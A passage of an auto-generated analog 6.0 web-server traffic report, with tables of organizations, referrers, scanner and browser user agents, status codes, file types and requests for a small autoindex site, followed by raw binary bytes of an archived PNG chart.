class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">10</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">326</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">62</td><td class="b">21.33%</td><td class="xl">205.169</td></tr> <tr><td class="R">54</td><td class="b">16.72%</td><td class="xl">34</td></tr> <tr><td class="R">19</td><td class="b"> 4.90%</td><td class="xl">35</td></tr> <tr><td class="R">15</td><td class="b"> 8.22%</td><td class="xl">3</td></tr> <tr><td class="R">10</td><td class="b"> 3.48%</td><td class="xl">54</td></tr> <tr><td class="R">10</td><td class="b"> 2.19%</td><td class="xl">167.94</td></tr> <tr><td class="R">10</td><td class="b"> 2.24%</td><td class="xl">206.168</td></tr> <tr><td class="R">9</td><td class="b"> 2.61%</td><td class="xl">123</td></tr> <tr><td class="R">7</td><td class="b"> 2.51%</td><td class="xl">157.230</td></tr> <tr><td class="R">6</td><td class="b"> 1.82%</td><td class="xl">27</td></tr> <tr><td class="R">6</td><td class="b"> 2.76%</td><td class="xl">205.210</td></tr> <tr><td class="R">6</td><td class="b"> 0.86%</td><td class="xl">199.45</td></tr> <tr><td class="R">6</td><td class="b"> 1.17%</td><td class="xl">66.132</td></tr> <tr><td class="R">5</td><td class="b"> 2.24%</td><td class="xl">198.235</td></tr> <tr><td class="R">4</td><td class="b"> 1.36%</td><td class="xl">185.177</td></tr> <tr><td class="R">4</td><td class="b"> 1.41%</td><td class="xl">95</td></tr> <tr><td class="R">4</td><td class="b"> 1.92%</td><td class="xl">2</td></tr> <tr><td class="R">4</td><td class="b"> 0.09%</td><td class="xl">194.87</td></tr> <tr><td class="R">4</td><td class="b"> 0.49%</td><td class="xl">44</td></tr> <tr><td class="R">3</td><td class="b"> 0.71%</td><td class="xl">183.134</td></tr> <tr><td class="R">78</td><td class="b">20.96%</td><td class="xl">[not listed: 44 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">22</td><td class="xl"><a href="http://www.play.peerkinton.com/">http://www.play.peerkinton.com/</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="http://www.play.peerkinton.com/cgi-bin">http://www.play.peerkinton.com/cgi-bin</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://www.play.peerkinton.com/favicon.ico">http://www.play.peerkinton.com/favicon.ico</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">69</td><td class="xl">http://www.play.peerkinton.com/</td></tr> <tr><td class="R">8</td><td class="xl">http://play.peerkinton.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">34</td><td class="P">34</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">24</td><td class="P">24</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">10</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0</td></tr> <tr><td class="R">10</td><td class="P">8</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">31</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">12</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 13; CPH2065; Build/TQ2A.251004.104) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.82 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">python-httpx/0.28.1</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">curl/7.4.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36</td></tr> <tr><td class="R">21</td><td class="P">2</td><td class="xl">[not listed: 4 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">173</td><td class="P">86</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">158</td><td class="P">71</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">13</td><td class="P">13</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/601</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">81</td><td class="P">66</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">25</td><td class="P">23</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">8</td><td class="P">8</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">8</td><td class="xl"> Firefox/47</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/126</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/29</td></tr> <tr><td class="N">4</td><td class="R">10</td><td class="P">8</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">8</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">5</td><td class="R">7</td><td class="P">7</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">7</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">6</td><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla</td></tr> <tr><td class="N">7</td><td class="R">1</td><td class="P">1</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> curl/7</td></tr> <tr><td class="N">8</td><td class="R">5</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">9</td><td class="R">1</td><td class="P">1</td><td class="xl">Dalvik</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Dalvik/2</td></tr> <tr><td class="N"> </td><td class="R">4</td><td class="P">0</td><td class="xl">[not listed: 1 browser]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">109</td><td class="P">84</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">69</td><td class="P">45</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">69</td><td class="P">45</td><td class="xl"> Linux</td></tr> <tr><td class="N">3</td><td class="R">83</td><td class="P">35</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">63</td><td class="P">23</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">20</td><td class="P">12</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">4</td><td class="R">48</td><td class="P">31</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">326</td><td class="xl">200 OK</td></tr> <tr><td class="R">3</td><td class="xl">301 Document moved permanently</td></tr> <tr><td class="R">37</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">1057</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">19</td><td class="b"> 0.54%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">205</td><td class="b">39.65%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">102</td><td class="b">59.80%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">212</td><td class="b">57.90%</td><td class="xl">[directories]</td></tr> <tr><td class="R">56</td><td class="b">29.68%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">21</td><td class="b"> 9.28%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">18</td><td class="b"> 2.60%</td><td class="xl">.svg</td></tr> <tr><td class="R">19</td><td class="b"> 0.54%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">212</td><td class="b">57.90%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">95</td><td class="b">41.56%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">19</td><td class="b"> 0.54%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">212</td><td class="b">57.90%</td><td class="D">Dec/ 1/25 3:24 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">22</td><td class="b"> 5.77%</td><td class="D">Dec/ 1/25 3:24 PM</td><td class="xl"> <a href="/?3.249.222.231">/?3.249.222.231</a></td></tr> <tr class="sub level2"><td class="R">19</td><td class="b"> 5.24%</td><td class="D">Sep/27/25 12:22 AM</td><td class="xl"> <a href="/?192.175.111.253">/?192.175.111.253</a></td></tr> <tr><td class="R">28</td><td class="b"> 3.67%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">28</td><td class="b">26.01%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">21</td><td class="b"> 9.28%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">37</td><td class="b"> 3.15%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">[not listed: 9 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK HG�[ � d d type.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��Mr�8�� No'��+W� �����דU�?�I�I�E�H4$���k�-Xd�~��zcog��u��~};{���W����� �$��` F�,�B!���B�`!D�"X,�B!���B�`!D�"X,�B�a��֥zm�ŗ��B��H���燑�͇����fXﭻ��ય{V��*��| z����2-<,�Y�`5�E,,.����T\�S��e"�����jq���*��:��%�f�3�\Ǯ�I��_`XM�-,'��>ZL"��A ���ſ���<�`5�D(,�Ã5�Ӱ�;��� X`5w��%V X�����}C!,�`aA�����+k�O-� Xa���-��"\\s�Z��NV�ո;��Z/[,w�"��)XPX�ek�K�oI��&�W�P�%�Ê,0�ղ��%��7�D��jI���!�Z+[XB��4v�z��pQ���!��Z b�����Q7�D���*�� �`� �b�!V>�,��Ԟ2����]x�*�U��`�*V3͚XVpX�4k6���a�Ҭ���钅��H�?o��j�Zk�2��֧�?�l����v������a�>���I��;(�� Y9Ђ�J�����|�d�u�pld���z���V2�Yg1V�]�J[� X�K��̧A��%u���gB�ݮ,��P�RUˏ��W�%�ɵ�6��16�p���e������+e-�z��Y��*�0��%,�KM�< �h����(X k��`Kq���� �#����ްD$�%���jϏ�*���皵p�9�a��ėU�9�>�y��lY�O;�r���V�Zg �5N9���[kX� fP���uk��`]�l:ka�����.ߨ[�`=���u�&`�Ɗ[+f-�B���{+f����b�N�`�y�ߜ���+�Oa�ZXX�fay��#���%��\���a�ƊZ +b�UX��� �L|;V�Z���ޣ7���� \�[6�oz��")�Z� 